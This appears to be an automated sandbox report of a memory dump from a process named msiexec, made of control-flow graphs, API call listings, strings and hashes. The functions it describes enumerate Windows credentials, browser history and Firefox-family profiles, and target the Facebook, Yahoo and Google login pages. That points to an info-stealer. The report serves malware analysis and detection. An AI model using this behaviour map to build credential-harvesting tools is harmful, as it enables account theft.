                                                                      control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 587 4093b1 574->587 588 4094ff-40950b call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 589 4093d3-4093dd call 4251c4 587->589 588->568 597 40950d-409511 588->597 598 4093b3-4093cc call 4253cf * 2 589->598 599 4093df 589->599 597->568 601 409513-40951d call 408f2f 597->601 598->589 615 4093ce-4093d1 598->615 603 4094f7-4094fa call 424f26 599->603 601->568 603->588 611->580 613 40929f-4092a3 611->613 613->580 614 4092a9-4092ba 613->614 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->589 618 4093e4-4093fb call 4253af * 2 615->618 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                                                                      APIs
                                                                      • memset.MSVCRT ref: 004091E2
                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                      • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                      • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                      • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                      • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                      • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                      • String ID:
                                                                      • API String ID: 3715365532-3916222277
                                                                      • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                      • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                        • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                      • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                      • String ID: bhv
                                                                      • API String ID: 4234240956-2689659898
                                                                      • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                      • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                      APIs
                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                      • API String ID: 2941347001-70141382
                                                                      • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                      • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 710 4467ac-4467b7 __setusermatherr 703->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->711 705->701 709 44674d-44674f 705->709 706->701 708 446734-44673b 706->708 708->701 712 44673d-446745 708->712 713 446755-446758 709->713 710->711 716 446810-446819 711->716 717 44681e-446825 711->717 712->713 713->703 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 728 446853-446864 GetStartupInfoW 721->728 729 44684d-446851 721->729 722->720 723->719 723->724 724->721 726 446840-446842 724->726 726->721 730 446866-44686a 728->730 731 446879-44687b 728->731 729->726 729->728 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                      • String ID:
                                                                      • API String ID: 2827331108-0
                                                                      • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                      • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                      • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                      • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040C298
                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                      • wcschr.MSVCRT ref: 0040C324
                                                                      • wcschr.MSVCRT ref: 0040C344
                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                      • GetLastError.KERNEL32 ref: 0040C373
                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                      • String ID: visited:
                                                                      • API String ID: 1157525455-1702587658
                                                                      • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                      • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 782 40e283-40e286 775->782 776->775 787 40e21b-40e21d 776->787 783 40e291-40e294 call 40aa04 782->783 784 40e288-40e290 free 782->784 783->769 784->783 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                                      APIs
                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                      • memset.MSVCRT ref: 0040E1BD
                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                      • free.MSVCRT ref: 0040E28B
                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                      • _snwprintf.MSVCRT ref: 0040E257
                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                      • API String ID: 2804212203-2982631422
                                                                      • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                      • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                      • memset.MSVCRT ref: 0040BC75
                                                                      • memset.MSVCRT ref: 0040BC8C
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                      • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                      • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                      • String ID:
                                                                      • API String ID: 115830560-3916222277
                                                                      • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                      • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                      • _wcslwr.MSVCRT ref: 0040C817
                                                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                      • wcslen.MSVCRT ref: 0040C82C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                      • API String ID: 2936932814-4196376884
                                                                      • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                      • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 886 40bdb0-40bdce call 404363 889 40bf63-40bf6f call 40440c 886->889 890 40bdd4-40bddd 886->890 892 40bdee 890->892 893 40bddf-40bdec CredEnumerateW 890->893 894 40bdf0-40bdf2 892->894 893->894 894->889 896 40bdf8-40be18 call 40b2cc wcslen 894->896 899 40bf5d 896->899 900 40be1e-40be20 896->900 899->889 900->899 901 40be26-40be42 wcsncmp 900->901 902 40be48-40be77 call 40bd5d call 404423 901->902 903 40bf4e-40bf57 901->903 902->903 908 40be7d-40bea3 memset 902->908 903->899 903->900 909 40bea5 908->909 910 40bea7-40beea memcpy 908->910 909->910 911 40bf11-40bf2d wcschr 910->911 912 40beec-40bf06 call 40b2cc _wcsnicmp 910->912 913 40bf38-40bf48 LocalFree 911->913 914 40bf2f-40bf35 911->914 912->911 917 40bf08-40bf0e 912->917 913->903 914->913 917->911
                                                                      APIs
                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                      • wcslen.MSVCRT ref: 0040BE06
                                                                      • wcsncmp.MSVCRT ref: 0040BE38
                                                                      • memset.MSVCRT ref: 0040BE91
                                                                      • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                      • wcschr.MSVCRT ref: 0040BF24
                                                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                      • String ID:
                                                                      • API String ID: 697348961-0
                                                                      • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                      • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00403CBF
                                                                      • memset.MSVCRT ref: 00403CD4
                                                                      • memset.MSVCRT ref: 00403CE9
                                                                      • memset.MSVCRT ref: 00403CFE
                                                                      • memset.MSVCRT ref: 00403D13
                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                      • memset.MSVCRT ref: 00403DDA
                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                      • String ID: Waterfox$Waterfox\Profiles
                                                                      • API String ID: 1829478387-11920434
                                                                      • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                      • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00403E50
                                                                      • memset.MSVCRT ref: 00403E65
                                                                      • memset.MSVCRT ref: 00403E7A
                                                                      • memset.MSVCRT ref: 00403E8F
                                                                      • memset.MSVCRT ref: 00403EA4
                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                      • memset.MSVCRT ref: 00403F6B
                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                      • API String ID: 1829478387-2068335096
                                                                      • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                      • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00403FE1
                                                                      • memset.MSVCRT ref: 00403FF6
                                                                      • memset.MSVCRT ref: 0040400B
                                                                      • memset.MSVCRT ref: 00404020
                                                                      • memset.MSVCRT ref: 00404035
                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
